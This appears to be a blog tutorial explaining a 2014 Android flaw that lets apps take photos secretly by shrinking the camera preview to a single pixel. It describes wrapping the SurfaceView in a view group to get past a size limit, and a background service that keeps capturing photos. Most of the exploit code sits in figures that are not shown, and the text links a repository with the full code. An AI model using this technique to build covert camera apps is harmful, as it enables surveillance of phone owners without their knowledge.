Exploit the Android SecretPhoto Taking Vulnerability

Exploit the Android Secret Photo Taking Vulnerability

 

1.     Introduction

    Nowadays, almost all the smart phones integrate cameras. At the same time, apps use cameras are increasing sharply. Yet more and more apps declare camera access permission to do something misbehaving.

    It was about May 2014 when Szymon Sidor published the secret photo taking vulnerability. With this flaw, apps can take photo without knowing byanyone. The idea is simple and effective ---- just make the preview small enough so that it can be hardly seen. The following part will present how to craft a secret photo taking demo and run it on a real device.

 

2.     Pre-study

    According to safe.baidu.com, in Android platforms, if one wants to take photos using a camera, it must invoke the method “startPreview()”. Oncethis method is called, a preview will present to the user. If the preview is eliminated from the screen or become invisible, photos could be secretly taken without knowing by anyone.

Figure1: Preview

Figure2: Exploit Code Snippet

 

    As the picture shows, in the code snippet, the width and height of LayoutParams is set to 1, with flag not_focusable, not_touchable and so on. Then with this LayoutParams, a mPreview is passed to the WindowManager.addView method, so that the surface view is posted on the screen and occupies only one pixel. This is almost equal to “invisible”.

    This code snippet is quite simple, but lacks the context information of the whole exploitation. The next part, I’ll add those lacked information andbuild a usable exploit.

 

3.     Exploit Crafting

    Let’s begin with the procedure of taking a picture. As figure 3 shows, to hide a preview is to hide the surface view. A straightforward way is writtenas this:

<span style="font-size:14px;">wm.addView(surfaceView, layoutParams);</span>

    It passes the surface view directly to the WindowManager’s addView method with the crafted layout parameters. But it doesn’twork when running. That may because SurfaceView can’t be set to 1x1 pixels directly.

    To bypass this restriction, we can create a view group object, like a layout. Then add our surface view to this view group. At last, pass this view group object to the function WindowManager.addView. And it works!

    The exploit contains an activity and a service. See figure 4. The main functionality is implemented in service. Once this app runs, it’ll take photos all day every several seconds, until you kill this process.

Figure 3: Procedure of taking pictures

 

Figure 4: A brief figure about the exploit

 

4.     Summary

    In my opinion, secret photo taking is like a trick more than a vulnerability. Whatever, as long as we can do something interesting on it!

 

5.     References

    http://safe.baidu.com/2014-05/android-camera-exploit.html

    http://snacksforyourmind.blogspot.com/2014/05/exploring-limits-of-covert-data.html

    https://github.com/zeqiii/PhotoCapturer